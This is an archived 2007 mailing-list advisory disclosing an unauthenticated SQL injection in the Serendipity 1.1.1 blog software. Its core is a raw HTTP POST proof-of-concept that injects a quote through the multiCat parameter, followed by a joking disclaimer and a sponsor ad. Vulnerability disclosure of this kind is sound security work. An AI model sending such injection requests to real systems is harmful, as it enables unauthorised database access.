WebApp Sec mailing list archives
Serendipity unauthenticated SQL-Injection
From: SaMuschie <samuschie () yahoo de>
Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . +------------------------------------------- -- - - | Application: serendipity | Version: 1.1.1 (others not testet) | Vuln./Exploit Type: SQL-Injection | Status: 0day +----------------------------------------- -- - - | Discovered by: Samenspender | Released: 20070301 | SaMuschie Release Number: 4 +------------------------------- - -- - POST /serendipity/index.php?frontpage HTTP/1.0 User-Agent: Mozilla/5.0 (SaMuschie) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 67 Connection: close serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21 +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc rYF05IF5Rztw2+FzaqhUyA4= =sQNU -----END PGP SIGNATURE----- ___________________________________________________________ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de ------------------------------------------------------------------------- Sponsored by: Watchfire The Twelve Most Common Application-level Hack Attacks Hackers continue to add billions to the cost of doing business online despite security executives' efforts to prevent malicious attacks. This whitepaper identifies the most common methods of attacks that we have seen, and outlines a guideline for developing secure web applications. Download today! https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHe --------------------------------------------------------------------------
Current thread:
- Serendipity unauthenticated SQL-Injection SaMuschie (Mar 01)